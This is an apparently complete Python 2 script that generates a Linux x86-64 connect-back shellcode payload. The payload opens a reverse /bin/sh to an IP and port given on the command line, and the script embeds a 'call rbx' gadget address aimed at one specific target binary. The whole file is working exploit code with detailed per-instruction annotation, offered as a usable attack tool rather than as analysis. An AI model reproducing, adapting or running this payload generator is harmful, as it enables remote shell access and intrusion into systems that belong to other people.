#!/usr/bin/python

import struct
import sys
import socket

# Two-byte short jump (eb 08 = `jmp $+10`): it skips the 8 bytes that follow
# it, so when placed directly in front of CALL_RBX inside the NOP sled the
# embedded address is hopped over instead of being decoded as instructions.
JMP = '\xeb\x08'
# 8-byte little-endian value 0x0000000000402ce6. The name suggests this is the
# address of a `call rbx` gadget in one specific target binary (exploit-specific;
# confirm against the target). Note it contains NUL bytes, so the finished
# payload is only usable where the delivery path tolerates \x00.
CALL_RBX = '\xe6\x2c\x40\x00\x00\x00\x00\x00'
# int3 -- prepend to the payload to trap into a debugger while testing.
BREAKPOINT = '\xcc'

# Linux x86-64 connect-back /bin/sh, 99 bytes, grouped one instruction per line.
# The leading numbers are byte offsets into the finished string. The eight 0x01
# bytes at offsets 21..28 are a placeholder that the generator overwrites with
# sin_family, sin_port and sin_addr (struct sockaddr_in minus sin_zero, which
# the code zeroes on the stack separately).
shellcode = (
    # 0: socket(AF_INET, SOCK_STREAM, 0)   rax=41
    '\x6a\x29\x58'          # push 0x29 ; pop rax
    '\x6a\x02\x5f'          # push 2    ; pop rdi     AF_INET
    '\x6a\x01\x5e'          # push 1    ; pop rsi     SOCK_STREAM
    '\x99'                  # cdq                     edx = 0 (eax is positive)
    '\x0f\x05'              # syscall
    '\x89\xc5'              # mov ebp, eax            keep the socket fd in ebp
    # 14: a zero qword on the stack doubles as sin_zero
    '\x6a\x01'              # push 1
    '\xfe\x0c\x24'          # dec byte [rsp]          -> 0
    # 19: first 8 bytes of sockaddr_in loaded as imm64 (placeholder at 21..28)
    '\x48\xb8'              # mov rax, imm64
    '\x01\x01\x01\x01\x01\x01\x01\x01'
    '\x50'                  # push rax                rsp -> sockaddr_in
    # 30: connect(fd, rsp, 16)   rax=42
    '\x89\xef'              # mov edi, ebp
    '\x48\x89\xe6'          # mov rsi, rsp
    '\x6a\x10\x5a'          # push 16   ; pop rdx
    '\x6a\x2a\x58'          # push 0x2a ; pop rax
    '\x0f\x05'              # syscall
    # 43: dup2(fd, 2), dup2(fd, 1), dup2(fd, 0)   rax=33; the counter lives in
    # esi and is saved around the syscall with push/pop
    '\x6a\x03'              # push 3
    '\x89\xef'              # mov edi, ebp            loop re-enters here
    '\x5e'                  # pop rsi
    '\xff\xce'              # dec esi
    '\x78\x08'              # js +8                   esi < 0 -> leave the loop
    '\x56'                  # push rsi
    '\x6a\x21\x58'          # push 0x21 ; pop rax
    '\x0f\x05'              # syscall
    '\xeb\xf1'              # jmp -15                 back to mov edi, ebp
    # 60: execve("/bin//sh", NULL, NULL)   rax=59
    '\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68'  # mov rax, "/bin//sh"
    '\x99'                  # cdq                     edx = 0 -> envp
    '\x89\xd6'              # mov esi, edx            argv = NULL
    '\x52'                  # push rdx                NUL terminator
    '\x50'                  # push rax                the path string
    '\x48\x89\xe7'          # mov rdi, rsp
    '\x6a\x3b\x58'          # push 0x3b ; pop rax
    '\x0f\x05'              # syscall
    # 83: 16-byte NOP sled; the generator writes JMP + CALL_RBX into 86..95
    '\x90\x90\x90\x90\x90\x90\x90\x90'
    '\x90\x90\x90\x90\x90\x90\x90\x90'
)

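def replace_into(template, replace, index):
    """Return *template* with the span [index, index + len(replace)) overwritten by *replace*.

    The result always has exactly the length of *template*. A patch that would
    start before offset 0 or run past the end is rejected, so a failed
    ``str.find`` (-1) or an oversized patch fails loudly instead of silently
    producing a payload with a different length or layout.

    Args:
        template: the byte string to patch.
        replace: the bytes to write into *template*.
        index: offset of the first byte to overwrite.

    Raises:
        ValueError: if *index* is negative or the patch does not fit.
    """
    end = index + len(replace)
    if index < 0 or end > len(template):
        raise ValueError('patch of %d bytes does not fit at offset %d in a %d-byte template'
                         % (len(replace), index, len(template)))
    return template[:index] + replace + template[end:]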

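def main(argv):
    """Build the connect-back payload for ``argv[1]:argv[2]`` and write it to stdout.

    Returns a process exit status: 0 on success, 1 on bad arguments or a
    broken template. Usage and error text go to stderr, so redirecting stdout
    to a file never mixes prose into the binary payload (and a failure is
    visible through the exit status).
    """
    if len(argv) != 3:
        sys.stderr.write('Usage: %s <connectback ip> <port>\n' % argv[0])
        return 1

    try:
        port = int(argv[2])
    except ValueError:
        sys.stderr.write('port must be an integer, got %r\n' % argv[2])
        return 1
    if not 0 < port <= 65535:
        sys.stderr.write('port must be in 1..65535, got %d\n' % port)
        return 1
    try:
        addr = socket.inet_aton(argv[1])
    except socket.error:
        sys.stderr.write('invalid IPv4 address: %r\n' % argv[1])
        return 1

    # Drop the exploit-specific gadget address into the NOP sled, preceded by
    # a short jump that hops over it so it is never executed as code.
    payload = replace_into(shellcode, JMP + CALL_RBX, 86)

    # First 8 bytes of struct sockaddr_in as the x86-64 Linux target reads
    # them: sin_family (AF_INET = 2) in the target's little-endian byte order,
    # sin_port and sin_addr in network order. Spelling '<H' explicitly keeps
    # the output independent of the byte order of the generating machine.
    sockaddr = struct.pack('<H', 2) + struct.pack('!H', port) + addr
    offset = payload.find('\x01' * 8)
    if offset < 0:
        sys.stderr.write('sockaddr placeholder not found in shellcode template\n')
        return 1
    payload = replace_into(payload, sockaddr, offset)

    # NOTE: the payload contains NUL bytes (from CALL_RBX, and from the port or
    # address whenever an octet is zero); the delivery path must tolerate them.
    sys.stdout.write(payload)
    return 0


if __name__ == '__main__':
    sys.exit(main(sys.argv))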
